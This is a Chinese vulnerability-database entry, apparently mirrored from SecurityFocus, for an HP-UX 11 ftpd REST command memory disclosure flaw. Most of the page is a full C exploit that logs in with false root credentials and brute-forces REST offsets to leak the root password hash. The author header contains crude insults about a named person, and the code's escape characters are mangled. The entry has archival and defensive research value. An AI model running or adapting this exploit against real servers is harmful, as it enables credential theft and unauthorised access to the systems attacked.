HP-UX FTPD 1.1.214.4 – REST Command Memory Disclosure
漏洞ID | 1053937 | 漏洞类型 | |
发布时间 | 2003-06-05 | 更新时间 | 2003-06-05 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | HP-UX | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7825/info
A vulnerability has been discovered in the HP-UX 11 ftpd daemon. The problem can be triggered using the FTP REST command. By specifying a specially calculated numeric argument to the command, it is possible to disclose the contents of that numeric location in process memory. This issue may be exploited to disclose the contents of sensitive files, such as /etc/passwd.
/*
DeepMagic - There be some Deep Magic brewin...
http://www.deep-magic.org/
http://www.deepmagic.us/
http://www.deepmagic.info/
http://www.deepmagic.name/
http://www.deepmagic.org is down atm untill opensrs/tucows
restores the domain to the proper owner.
DMhpux FTPd REST bug brute forcer
brought to you by di0aD
mad props to the media hoar phased aka Mister-X aka
MisterX aka Matt Carrol of the UK for giving
the purfekt bl0w j0b.
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
int main (int argc, char *argv[]) {
int sock, rc;
long int i;
struct sockaddr_in saddr;
struct hostent *h;
char buf[256];
printf("DMhpux FTPd - REST bug brute forcern");
printf("by di0aDn");
if(argc < 2) {
printf("usage: %s <host> -- simple enough?n",argv[0]);
exit(1);
}
h = gethostbyname(argv[1]);
if(h==NULL) {
printf("%s: unknown host '%s'n",argv[0],argv[1]);
exit(1);
}
saddr.sin_family = h->h_addrtype;
memcpy((char *) &saddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
saddr.sin_port = htons(21);
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock<0) {
perror("cannot open socket ");
exit(1);
}
rc = connect(sock, (struct sockaddr *) &saddr, sizeof(saddr));
if(rc<0) {
perror("cannot connect ");
exit(1);
}
printf("Sending false login credentialsn");
snprintf(buf, sizeof(buf), "USER rootrn");
printf("sending %sn", buf);
rc = send(sock, buf, strlen(buf), 0);
if(rc<0) {
perror("cannot send data ");
close(sock);
exit(0);
}
dorecv(sock);
usleep(1000);
memset(buf, 0, sizeof(buf));
snprintf(buf, sizeof(buf), "PASS foorn");
printf("sending %sn", buf);
rc = send(sock, buf, strlen(buf), 0);
usleep(1000);
dorecv(sock);
dorecv(sock);
for(i=1073931080;i<=1073945000;i = i+10) {
snprintf(buf, sizeof(buf), "REST %drn", i);
printf("sending %sn", buf);
send(sock, buf, strlen(buf), 0);
dorecv(sock);
}
return 0;
}
int dorecv(int sock) {
char buf[256];
char *check;
memset(buf, 0, sizeof(buf));
recv(sock, buf, sizeof(buf), 0);
printf("got: %sn", buf);
check = (char *)strstr(buf, "root");
if(check != NULL) {
printf("Got root hashn");
}
}
// it takes two to tango
相关推荐: Symantec pcAnywhere Port Scan DoS Vulnerability
Symantec pcAnywhere Port Scan DoS Vulnerability 漏洞ID 1104177 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2000-04-25 更新时间 20…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666